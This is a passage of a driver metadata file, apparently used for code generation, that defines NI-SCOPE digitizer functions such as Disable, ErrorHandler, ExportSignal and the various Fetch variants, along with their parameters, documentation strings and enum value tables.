'direction': 'in',
'documentation': {
'description': '\nSpecifies how to couple the input signal. Refer to\nNISCOPE_ATTR_VERTICAL_COUPLING for more information.\n'
},
'enum': 'VerticalCoupling',
'name': 'coupling',
'type': 'ViInt32'
},
{
'default_value': 1.0,
'direction': 'in',
'documentation': {
'description': '\nSpecifies the probe attenuation. Refer to\nNISCOPE_ATTR_PROBE_ATTENUATION for valid values.\n'
},
'name': 'probeAttenuation',
'type': 'ViReal64'
},
{
'default_value': True,
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether the channel is enabled for acquisition. Refer to\nNISCOPE_ATTR_CHANNEL_ENABLED for more information.\n'
},
'name': 'enabled',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'Disable': {
'documentation': {
'description': '\nAborts any current operation, opens data channel relays, and releases\nRTSI and PFI lines.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ErrorHandler': {
'codegen_method': 'no',
'documentation': {
'description': '\nTakes the error code returned by NI-SCOPE functions and returns the\ninterpretation as a user-readable string.\n',
'note': '\nYou can pass VI_NULL as the instrument handle, which is useful to\ninterpret errors after niScope_init has failed.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe error code that is returned from any of the instrument driver\nfunctions.\n'
},
'name': 'errorCode',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nSpecifies the function in which the error occurred. You can pass in a\nstring no longer than MAX_FUNCTION_NAME_SIZE. If you pass in a valid\nstring, this source is included in the **errorDescription** string. For\nexample:\n\n"Error <**errorCode**> at <**errorSource**>"\n\nIf you pass in NULL or an empty string, this parameter is ignored.\n'
},
'name': 'errorSource',
'size': {
'mechanism': 'fixed',
'value': 55
},
'type': 'ViChar[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the interpreted error code as a user readable message string;\nyou must pass a ViChar array at least MAX_ERROR_DESCRIPTION bytes in\nlength.\n'
},
'name': 'errorDescription',
'size': {
'mechanism': 'fixed',
'value': 388
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'ExportAttributeConfigurationBuffer': {
'documentation': {
'description': '\nExports the attribute configuration of the session to a configuration\nbuffer.\n\nYou can export and import session attribute configurations only between\ndevices with identical model numbers, channel counts, and onboard memory\nsizes.\n\nThis function verifies that the attributes you have configured for the\nsession are valid. If the configuration is invalid, NI‑SCOPE returns an\nerror.\n\n**Related Topics:**\n\n`Attributes and Attribute\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(attributes_and_attribute_functions)>`__\n\n`Setting Attributes Before Reading\nAttributes <REPLACE_DRIVER_SPECIFIC_URL_1(setting_before_reading_attributes)>`__\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the size, in bytes, of the byte array to export. If you enter\n0, this function returns the needed size.\n'
},
'name': 'sizeInBytes',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nSpecifies the byte array buffer to be populated with the exported\nattribute configuration.\n'
},
'name': 'configuration',
'size': {
'mechanism': 'ivi-dance',
'value': 'sizeInBytes'
},
'type': 'ViInt8[]'
}
],
'returns': 'ViStatus'
},
'ExportAttributeConfigurationFile': {
'documentation': {
'description': '\nExports the attribute configuration of the session to the specified\nfile.\n\nYou can export and import session attribute configurations only between\ndevices with identical model numbers, channel counts, and onboard memory\nsizes.\n\nThis function verifies that the attributes you have configured for the\nsession are valid. If the configuration is invalid, NI‑SCOPE returns an\nerror.\n\n**Related Topics:**\n\n`Attributes and Attribute\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(attributes_and_attribute_functions)>`__\n\n`Setting Attributes Before Reading\nAttributes <REPLACE_DRIVER_SPECIFIC_URL_1(setting_before_reading_attributes)>`__\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the absolute path to the file to contain the exported\nattribute configuration. If you specify an empty or relative path, this\nfunction returns an error.\n**Default file extension:** .niscopeconfig\n'
},
'name': 'filePath',
'type': 'ViConstString'
}
],
'returns': 'ViStatus'
},
'ExportSignal': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigures the digitizer to generate a signal that other devices can\ndetect when configured for digital triggering or sharing clocks. The\n**signal** parameter specifies what condition causes the digitizer to\ngenerate the signal. The **outputTerminal** parameter specifies where to\nsend the signal on the hardware (such as a PFI connector or RTSI line).\n\nIn cases where multiple instances of a particular signal exist, use the\n**signalIdentifier** input to specify which instance to control. For\nnormal signals, only one instance exists and you should leave this\nparameter set to the empty string. You can call this function multiple\ntimes and set each available line to a different signal.\n\nTo unprogram a specific line on device, call this function with the\nsignal you no longer want to export and set **outputTerminal** to\nNISCOPE_VAL_NONE.\n',
'note': 'This function replaces niScope_ConfigureTriggerOutput.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nsignal (clock, trigger, or event) to export.\n\n**Defined Values**\n',
'table_body': [
[
'NISCOPE_VAL_REF_TRIGGER',
'(1)',
'Generate a pulse when detecting the Stop/Reference trigger.'
],
[
'NISCOPE_VAL_START_TRIGGER',
'(2)',
'Generate a pulse when detecting a Start trigger.'
],
[
'NISCOPE_VAL_END_OF_ACQUISITION_EVENT',
'(3)',
'Generate a pulse when the acquisition finishes.'
],
[
'NISCOPE_VAL_END_OF_RECORD_EVENT',
'(4)',
'Generate a pulse at the end of the record.'
],
[
'NISCOPE_VAL_ADVANCE_TRIGGER',
'(5)',
'Generate a pulse when detecting an Advance trigger.'
],
[
'NISCOPE_VAL_READY_FOR_ADVANCE_EVENT',
'(6)',
'Asserts when the digitizer is ready to advance to the next record.'
],
[
'NISCOPE_VAL_READY_FOR_START_EVENT',
'(7)',
'Asserts when the digitizer is initiated and ready to accept a Start trigger and begin sampling.'
],
[
'NISCOPE_VAL_READY_FOR_REF_EVENT',
'(10)',
'Asserts when the digitizer is ready to accept a Reference trigger.'
],
[
'NISCOPE_VAL_REF_CLOCK',
'(100)',
'Export the Reference clock for the digitizer to the specified terminal.'
],
[
'NISCOPE_VAL_SAMPLE_CLOCK',
'(101)',
'Export the Sample clock for the digitizer to the specified terminal.'
],
[
'NISCOPE_VAL_5V_OUT',
'(13)',
'Exports a 5 V power supply.'
]
]
},
'enum': 'ExportableSignals',
'name': 'signal',
'type': 'ViInt32'
},
{
'default_value': '"None"',
'direction': 'in',
'documentation': {
'description': 'Describes the signal being exported.'
},
'name': 'signalIdentifier',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nIdentifies the hardware signal line on which the digital pulse is\ngenerated.\n\n**Defined Values**\n',
'table_body': [
[
'NISCOPE_VAL_RTSI_0',
'("VAL_RTSI_0")'
],
[
'NISCOPE_VAL_RTSI_1',
'("VAL_RTSI_1")'
],
[
'NISCOPE_VAL_RTSI_2',
'("VAL_RTSI_2")'
],
[
'NISCOPE_VAL_RTSI_3',
'("VAL_RTSI_3")'
],
[
'NISCOPE_VAL_RTSI_4',
'("VAL_RTSI_4")'
],
[
'NISCOPE_VAL_RTSI_5',
'("VAL_RTSI_5")'
],
[
'NISCOPE_VAL_RTSI_6',
'("VAL_RTSI_6")'
],
[
'NISCOPE_VAL_RTSI_7',
'("VAL_RTSI_7")'
],
[
'NISCOPE_VAL_PXI_STAR',
'("VAL_PXI_STAR")'
],
[
'NISCOPE_VAL_PFI_0',
'("VAL_PFI_0")'
],
[
'NISCOPE_VAL_PFI_1',
'("VAL_PFI_1")'
],
[
'NISCOPE_VAL_PFI_2',
'("VAL_PFI_2")'
],
[
'NISCOPE_VAL_CLK_OUT',
'("VAL_CLK_OUT")'
]
]
},
'name': 'outputTerminal',
'type': 'ViConstString'
}
],
'returns': 'ViStatus'
},
'FancyFetch': {
'codegen_method': 'python-only',
'documentation': {
'description': '\nReturns the waveform from a previously initiated acquisition that the\ndigitizer acquires for the specified channel. This function returns\nscaled voltage waveforms.\n\nThis function may return multiple waveforms depending on the number of\nchannels, the acquisition type, and the number of records you specify.',
'note': 'Some functionality, such as time stamping, is not supported in all digitizers.'
},
'method_templates': [
{
'documentation_filename': 'default_method',
'method_python_name_suffix': '',
'session_filename': 'fancy_fetch'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'The instrument handle you obtain from niScope_init that identifies a particular instrument session.'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'The channel(s) to fetch from.'
},
'name': 'channelList',
'type': 'ViString'
},
{
'default_value': None,
'direction': 'in',
'documentation': {
'description': 'The maximum number of samples to fetch for each waveform. If the acquisition finishes with fewer points than requested, some devices return partial data if the acquisition finished, was aborted, or a timeout of 0 was used. If it fails to complete within the timeout period, the function raises.'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'default_value': 'FetchRelativeTo.PRETRIGGER',
'direction': 'in',
'documentation': {
'description': 'Position to start fetching within one record.'
},
'enum': 'FetchRelativeTo',
'name': 'relativeTo',
'type': 'ViInt32'
},
{
'default_value': 0,
'direction': 'in',
'documentation': {
'description': 'Offset in samples to start fetching data within each record. The offset can be positive or negative.'
},
'name': 'offset',
'type': 'ViInt32'
},
{
'default_value': 0,
'direction': 'in',
'documentation': {
'description': 'Zero-based index of the first record to fetch.'
},
'name': 'recordNumber',
'type': 'ViInt32'
},
{
'default_value': None,
'direction': 'in',
'documentation': {
'description': 'Number of records to fetch. Use -1 to fetch all configured records.'
},
'name': 'numRecords',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': 'The time to wait for data to be acquired; using 0 for this parameter tells NI-SCOPE to fetch whatever is currently available. Using -1 seconds for this parameter implies infinite timeout.'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'python_type': 'float or datetime.timedelta',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of classes with the following timing and scaling information about each waveform:\n\n- **relative_initial_x** (float) the time (in seconds) from the trigger to the first sample in the fetched waveform\n- **absolute_initial_x** (float) timestamp (in seconds) of the first fetched sample. This timestamp is comparable between records and acquisitions; devices that do not support this parameter use 0 for this output.\n- **x_increment** (float) the time between points in the acquired waveform in seconds\n- **channel** (str) channel name this waveform was acquired from\n- **record** (int) record number of this waveform\n- **gain** (float) the gain factor of the given channel; useful for scaling binary data with the following formula:\n\n .. math::\n\n voltage = binary data * gain factor + offset\n\n- **offset** (float) the offset factor of the given channel; useful for scaling binary data with the following formula:\n\n .. math::\n\n voltage = binary data * gain factor + offset\n\n- **samples** (array of float) floating point array of samples. Length will be of the actual samples acquired\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'python_name': 'fetch',
'returns': 'ViStatus'
},
'FancyGetEqualizationFilterCoefficients': {
'codegen_method': 'python-only',
'documentation': {
'description': 'Retrieves the custom coefficients for the equalization FIR filter on the device. This filter is designed to compensate the input signal for artifacts introduced to the signal outside of the digitizer. Because this filter is a generic FIR filter, any coefficients are valid. Coefficient values should be between +1 and –1.'
},
'method_templates': [
{
'documentation_filename': 'default_method',
'method_python_name_suffix': '',
'session_filename': 'get_equalization_filter_coefficients'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'The instrument handle you obtain from niScope_init that identifies a particular instrument session.'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'The channel to configure.'
},
'name': 'channel',
'type': 'ViString'
}
],
'python_name': 'get_equalization_filter_coefficients',
'returns': 'ViStatus'
},
'FancyRead': {
'codegen_method': 'python-only',
'documentation': {
'description': '\nInitiates an acquisition, waits for it to complete, and retrieves the\ndata. The process is similar to calling niScope_InitiateAcquisition,\nniScope_AcquisitionStatus, and niScope_Fetch. The only difference is\nthat with niScope_Read, you enable all channels specified with\n**channelList** before the acquisition; in the other method, you enable\nthe channels with niScope_ConfigureVertical.\n\nThis function may return multiple waveforms depending on the number of\nchannels, the acquisition type, and the number of records you specify.',
'note': 'Some functionality, such as time stamping, is not supported in all digitizers.'
},
'method_templates': [
{
'documentation_filename': 'default_method',
'method_python_name_suffix': '',
'session_filename': 'fancy_fetch'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'The instrument handle you obtain from niScope_init that identifies a particular instrument session.'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'The channel(s) to read from.'
},
'name': 'channelList',
'type': 'ViString'
},
{
'default_value': None,
'direction': 'in',
'documentation': {
'description': 'The maximum number of samples to fetch for each waveform. If the acquisition finishes with fewer points than requested, some devices return partial data if the acquisition finished, was aborted, or a timeout of 0 was used. If it fails to complete within the timeout period, the function raises.'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'default_value': 'FetchRelativeTo.PRETRIGGER',
'direction': 'in',
'documentation': {
'description': 'Position to start fetching within one record.'
},
'enum': 'FetchRelativeTo',
'name': 'relativeTo',
'type': 'ViInt32'
},
{
'default_value': 0,
'direction': 'in',
'documentation': {
'description': 'Offset in samples to start fetching data within each record. The offset can be positive or negative.'
},
'name': 'offset',
'type': 'ViInt32'
},
{
'default_value': 0,
'direction': 'in',
'documentation': {
'description': 'Zero-based index of the first record to fetch.'
},
'name': 'recordNumber',
'type': 'ViInt32'
},
{
'default_value': None,
'direction': 'in',
'documentation': {
'description': 'Number of records to fetch. Use -1 to fetch all configured records.'
},
'name': 'numRecords',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': 'The time to wait for data to be acquired; using 0 for this parameter tells NI-SCOPE to fetch whatever is currently available. Using -1 seconds for this parameter implies infinite timeout.'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'python_type': 'float or datetime.timedelta',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of classes with the following timing and scaling information about each waveform:\n\n- **relative_initial_x** (float) the time (in seconds) from the trigger to the first sample in the fetched waveform\n- **absolute_initial_x** (float) timestamp (in seconds) of the first fetched sample. This timestamp is comparable between records and acquisitions; devices that do not support this parameter use 0 for this output.\n- **x_increment** (float) the time between points in the acquired waveform in seconds\n- **channel** (str) channel name this waveform was acquired from\n- **record** (int) record number of this waveform\n- **gain** (float) the gain factor of the given channel; useful for scaling binary data with the following formula:\n\n .. math::\n\n voltage = binary data * gain factor + offset\n\n- **offset** (float) the offset factor of the given channel; useful for scaling binary data with the following formula:\n\n .. math::\n\n voltage = binary data * gain factor + offset\n\n- **samples** (array of float) floating point array of samples. Length will be of the actual samples acquired\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'python_name': 'read',
'returns': 'ViStatus'
},
'Fetch': {
'codegen_method': 'private',
'documentation': {
'description': '\nReturns the waveform from a previously initiated acquisition that the\ndigitizer acquires for the specified channel. This function returns\nscaled voltage waveforms.\n\nThis function may return multiple waveforms depending on the number of\nchannels, the acquisition type, and the number of records you specify.\n',
'note': '\nYou can use niScope_Read instead of this function. niScope_Read\nstarts an acquisition on all enabled channels, waits for the acquisition\nto complete, and returns the waveform for the specified channel.\n\nSome functionality, such as time stamping, is not supported in all\ndigitizers. Refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'method_name_for_documentation': 'fetch',
'method_templates': [
{
'method_python_name_suffix': '',
'session_filename': 'default_method'
},
{
'method_python_name_suffix': '_into_numpy',
'session_filename': 'numpy_read_method'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumwfms to determine the number of\nwaveforms.\n\nNI-SCOPE returns this data sequentially, so all record 0 waveforms are\nfirst. For example, with a channel list of 0,1, you would have the\nfollowing index values:\n\nindex 0 = record 0, channel 0\n\nindex *x* = record 0, channel 1\n\nindex 2\\ *x* = record 1, channel 0\n\nindex 3\\ *x* = record 1, channel 1\n\nWhere *x* = the record length\n'
},
'name': 'waveform',
'numpy': True,
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'ViReal64[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchArrayMeasurement': {
'codegen_method': 'private',
'documentation': {
'description': '\nObtains a waveform from the digitizer and returns the specified\nmeasurement array. This function may return multiple waveforms depending\non the number of channels, the acquisition type, and the number of\nrecords you specify.\n',
'note': '\nSome functionality, such as time stamping, is not supported in all\ndigitizers. Refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe `array\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(array_measurements_refs)>`__\nto perform.\n'
},
'enum': 'ArrayMeasurement',
'name': 'arrayMeasFunction',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples returned in the measurement waveform array\nfor each waveform measurement. Use niScope_ActualMeasWfmSize to\ndetermine the number of available samples.\n',
'note': '\nUse the attribute NISCOPE_ATTR_FETCH_MEAS_NUM_SAMPLES to set the\nnumber of samples to fetch when performing a measurement. For more\ninformation about when to use this attribute, refer to the `NI\nKnowledgeBase <javascript:WWW(WWW_KB_MEAS)>`__.\n'
},
'name': 'measWfmSize',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_meas_wfm_size(array_meas_function)'
},
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the number of waveforms times\n**measWfmSize**; call niScope_ActualNumWfms to determine the number of\nwaveforms; call niScope_ActualMeasWfmSize to determine the size of each\nwaveform.\n\nNI-SCOPE returns this data sequentially, so all record 0 waveforms are\nfirst. For example, with channel list of 0, 1, you would have the\nfollowing index values:\n\nindex 0 = record 0, channel 0\n\nindex *x* = record 0, channel 1\n\nindex 2\\ *x* = record 1, channel 0\n\nindex 3\\ *x* = record 1, channel 1\n\nWhere *x* = the record length\n'
},
'name': 'measWfm',
'size': {
'mechanism': 'python-code',
'value': '(self._actual_meas_wfm_size(array_meas_function) * self._actual_num_wfms())'
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchBinary16': {
'codegen_method': 'private',
'documentation': {
'description': '\nRetrieves data from a previously initiated acquisition and returns\nbinary 16-bit waveforms. This function may return multiple waveforms\ndepending on the number of channels, the acquisition type, and the\nnumber of records you specify.\n\nRefer to `Using Fetch\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(using_fetch_functions)>`__ for\nmore information on using this function.\n',
'note': '\nSome functionality, such as time stamping, is not supported in all\ndigitizers. Refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'method_name_for_documentation': 'fetch_into',
'method_templates': [
{
'method_python_name_suffix': '_into_numpy',
'session_filename': 'numpy_read_method'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumWfms to determine the number of\nwaveforms.\n\nNI-SCOPE returns this data sequentially, so all record 0 waveforms are\nfirst. For example, with a channel list of 0,1, you would have the\nfollowing index values:\n\nindex 0 = record 0, channel 0\n\nindex *x* = record 0, channel 1\n\nindex 2\\ *x* = record 1, channel 0\n\nindex 3\\ *x* = record 1, channel 1\n\nWhere *x* = the record length\n'
},
'name': 'waveform',
'numpy': True,
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'ViInt16[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchBinary32': {
'codegen_method': 'private',
'documentation': {
'description': '\nRetrieves data from a previously initiated acquisition and returns\nbinary 32-bit waveforms. This function may return multiple waveforms\ndepending on the number of channels, the acquisition type, and the\nnumber of records you specify.\n\nRefer to `Using Fetch\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(using_fetch_functions)>`__ for\nmore information on using this function.\n',
'note': '\nSome functionality, such as time stamping, is not supported in all\ndigitizers. Refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'method_name_for_documentation': 'fetch_into',
'method_templates': [
{
'method_python_name_suffix': '_into_numpy',
'session_filename': 'numpy_read_method'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumWfms to determine the number of\nwaveforms.\n\nNI-SCOPE returns this data sequentially, so all record 0 waveforms are\nfirst. For example, with a channel list of 0,1, you would have the\nfollowing index values:\n\nindex 0 = record 0, channel 0\n\nindex *x* = record 0, channel 1\n\nindex 2\\ *x* = record 1, channel 0\n\nindex 3\\ *x* = record 1, channel 1\n\nWhere *x* = the record length\n'
},
'name': 'waveform',
'numpy': True,
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'ViInt32[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
